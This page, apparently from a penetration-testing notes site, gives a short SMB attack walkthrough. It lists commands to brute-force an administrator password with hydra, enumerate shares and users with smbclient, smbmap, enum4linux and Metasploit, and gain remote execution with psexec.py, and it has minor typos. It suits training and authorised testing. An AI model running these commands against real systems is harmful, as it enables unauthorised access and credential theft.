Skip to content

AMRAP Security

SMB

AMRAP Security

Home
📱 Mobile Security
📱 Mobile Security
- Android
  Android
  - Frida Scripts
    Frida Scripts
    
    Overview
    
    Cryptography
    Cryptography
    
    Cryptography
    
    Random
    
    Data Storage
    Data Storage
    
    Log
    
    Print Stream
    
    Shared Preferences
    
    SQLite Database
    
    TextView
    
    Network
    Network
    
    HTTP Connection
    
    Read/Write Data
    
    SSL Pinning
    
    Platform Interaction
    Platform Interaction
    
    Permissions
  - Uncrackable L1
🕸️ Web Applications Security
🕸️ Web Applications Security
- Introduction
- Client Side Attacks
  Client Side Attacks
- Content Management Systems (CMS)
  Content Management Systems (CMS)
  - Introduction
  - WordPress
- Injection Attacks
  Injection Attacks
  - SQL Injection
- Tools
🌐 Network Security
🌐 Network Security
- Network Fundamentals
- Services And Protocols
  Services And Protocols
  - FTP
  - HTTP
  - MySQL
  - PostgreSQL
  - RDP
  - Rejetto HFS
  - SMB
  - SMTP
  - SNMP
  - SSH
  - WebDAV
  - WinRM
- Active Directory
- Information Gathering
  Information Gathering
- Exploitation
  Exploitation
  - Introduction
  - Remote Shells
  - Linux
    Linux
    
    Haraka
    
    libssh
    
    PHP CGI
    
    Samba
    
    Shellshock
    
    Tomcat
    
    vsftpd
- Windows
  Windows
- Post Exploitation
  Post Exploitation
  - Pivoting
  - Linux
    Linux
    
    Enumeration
    
    Privilege Escalation
    
    Persistence
    
    Hash Dumping
    
    Clearing Tracks
  - Windows
    Windows
    
    Overview
    
    Enumeration
    
    Privilege Escalation
    
    Persistence
    
    Hash Dumping
    
    Clearing Tracks
- Tools
  Tools
  - CrackMapExec
  - Empire
  - Metasploit
  - Mimikatz
  - Msfvenom
  - Nessus
  - Netcat
  - Nmap
  - Searchsploit
  - Socat
  - WMAP
⚡ Cheatsheets
⚡ Cheatsheets
- Network Security
- Web App Security

Targeting SMB

Identify usernames which will be used to perform a brute-force attack. Example:

hydra -l administrator -P PASSWORDS_LIST TARGET_IP smb

Once credentials are obtained, enumerate shares:

smbclient -L TARGET_IP -U USERNAME
# Enter password when requested

smbmap -u USERNAME -p PASSWORD -H TARGET_IP

Enumerate other users on the system:

# Using enum2linux
enum4linux -u UASERNAME -P PASSWORD TARGET_IP

# Using Metasploit
use auxiliary/scanner/smb/smb_enumusers
````

4. Use psexec.py
```bash
psexec.py USERNAME@TARGET_IP
# Enter password